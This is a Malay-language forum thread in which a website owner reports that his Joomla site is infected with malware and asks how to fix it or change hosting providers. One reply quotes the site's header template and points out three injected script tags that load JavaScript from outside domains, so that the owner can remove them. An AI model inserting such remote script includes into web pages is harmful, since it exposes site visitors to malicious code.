Nak tukar hosting macamana?

Discussion in 'Pembangunan Web' started by ApoKalypse, Jul 29, 2013.

By ApoKalypse on Jul 29, 2013 at 10:48 PM
  1. ApoKalypse

    freshman

    Joined:
    Jun 26, 2008
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    16
    Ratings:
    +0 / 0 / -0
    Assalam, saya sekarang gunakan Fivio sebagai hosting dan domain website saya. Masalahnya website saya telah infected oleh Malware, saya pun tak pasti kenapa. Saya dah msg bantuan kepada bahagian teknikal Fivio tetapi tiada jawapan/

    Jadi saya nak minta bantuan disini... Harap ada yg sudi membantu..

    www.bertuah.com.my
     
  2. Loading...


Tags: this article has not been tagged

Share This Page

Comments

Discussion in 'Pembangunan Web' started by ApoKalypse, Jul 29, 2013.

    1. vyner
      vyner
      dah lama ke bro hantar ticket kat diorang ? ?
    2. tux
      tux
      Fivio ni lembap juga rupanya.
      buang natang ni dari jomla header template. Agaknyalah saya tak reti jomla.
      Code:
      <!--Width of template -->
      <style type="text/css">
      .main {width: 980px;margin: 0 auto;}
      #ja-wrapper {min-width: 981px;}
      </style>
      
      [COLOR="#FF0000"]<script type="text/javascript" src="http://siu.edu.bd/includes/framework.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script>[/COLOR]</head>
      
      <body id="bd" class="fs3 FF">
      
      <div id="ja-wrapper">
      	<a name="Top" id="Top"></a>
      
      	<!-- HEADER -->
      
    3. paklong
      paklong
      ha ha ha ...........................gua pon pernah terkena .

      Gua blah.
    4. tux
    5. ApoKalypse
      ApoKalypse
    6. ApoKalypse
      ApoKalypse
      mcmana eh nk buang dia? boleh bantu ke...
    7. supermod
      supermod
      Tukar hosting terus...
    8. Dr. Peace
      Dr. Peace
      pi kat style dan buang kod tu..
    9. wawwi.com
      wawwi.com
      Nak tukar hosting, Nama domain urus sendiri atau beli pakej? Kalau berasingan senang kerja..
      kalau pakej kena minta support hosting utk tukar DNS ke hosting baru.. :)
    10. wawwi.com
      wawwi.com
      domain .com.my @ .my ni leceh sikit.. better sebenarnya urus sendiri domain berbanding transfer domain ke owner hosting untuk uruskannya.

      Lain hosting provider lain harga cas tahunan langganan domain.. Langgan Hosting, kat mana mana pun boleh guna.
    11. ApoKalypse
      ApoKalypse
      website saya dah repair dan dah hubungi Google, tapi masa saya buka web saya keluar code ni dan saya dah buat php.ini dan skrg dah ok. cuma saya nak tanya code ni maksudnya hosting yg saya sewa tu dah lock sesuatu ke?

      Last edited: Aug 13, 2013
    12. faezil
      faezil
      ada sesetgh domain, diberi secara 'built-in' dalam pakej hosting...

      cthnya.... beli plan XYZ dengan harga sekian2...percuma 1 domain....yg ini susah sket la nak mintak EPP code. kena slow talk la dengan hosting provider....

      sbb tu ada baiknya beli domain dan hosting ditempat yg berasingan
    13. umeks17
      umeks17
      Tips mudah dari boleh didapati di ananova dot com/10-steps-to-switching-hosting-providers

      moga membantu!
    14. ApoKalypse
      ApoKalypse
      masa saya beli hosting ni dari Fivio mmg xde percuma apa2, hosting dan domain lain2 harga...
    15. Despair
      Despair
      any good solution for this?
    16. Milestonjon075
      Milestonjon075
      I am involved in evolving your subscriber, so great pleasure contain me modified. I find the thoughts and mind-set of this post, very inspiring and actually worth following. pleasant work...
    17. RevoSeo
      RevoSeo
      Request je free transfer daripada host baru.
    18. natsu90
      natsu90
      tukar hosting je
    19. aripkarim
      aripkarim
      Just pendapat, cuba backup dulu semua file dalam hosting lama kat PC, subscribe hosting baru, set Domain Name Server untuk hosting baru di akaun domain, upload balik file yang backup mula-mula tadi di hosting yang baru.

      -harap memberi manfaat-
      Rekomen hosting - Hostgator- coupon diskaun: infosewawang

    Share This Page

Share This Page